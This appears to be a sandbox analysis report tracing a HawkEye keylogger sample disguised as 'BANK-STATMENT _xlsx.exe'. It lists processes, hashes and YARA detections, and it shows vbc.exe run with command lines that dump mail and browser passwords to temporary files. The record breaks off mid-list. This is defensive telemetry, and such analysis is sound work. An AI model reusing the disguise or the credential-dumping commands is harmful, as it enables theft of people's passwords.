                                                                              Analysis Process: vbc.exe PID: 6920 Parent PID: 4500

                                                                              General

                                                                              Start time:16:02:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: vbc.exe PID: 7044 Parent PID: 4500

                                                                              General

                                                                              Start time:16:02:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 1900 Parent PID: 3984

                                                                              General

                                                                              Start time:16:03:38
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 4240 Parent PID: 1900

                                                                              General

                                                                              Start time:16:03:39
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.803619602.0000000002F08000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 6452 Parent PID: 1900

                                                                              General

                                                                              Start time:16:03:41
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dw20.exe PID: 5456 Parent PID: 4240

                                                                              General

                                                                              Start time:16:03:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2304
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 3028 Parent PID: 6452

                                                                              General

                                                                              Start time:16:03:52
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 1548 Parent PID: 3028

                                                                              General

                                                                              Start time:16:03:53
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 2240 Parent PID: 3028

                                                                              General

                                                                              Start time:16:03:54
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dw20.exe PID: 5992 Parent PID: 1548

                                                                              General

                                                                              Start time:16:03:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2288
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: vbc.exe PID: 5676 Parent PID: 1548

                                                                              General

                                                                              Start time:16:04:02
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000019.00000002.833212497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: vbc.exe PID: 6708 Parent PID: 1548

                                                                              General

                                                                              Start time:16:04:02
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 6984 Parent PID: 2240

                                                                              General

                                                                              Start time:16:04:17
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 6180 Parent PID: 6984

                                                                              General

                                                                              Start time:16:04:18
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.885749429.0000000002F48000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
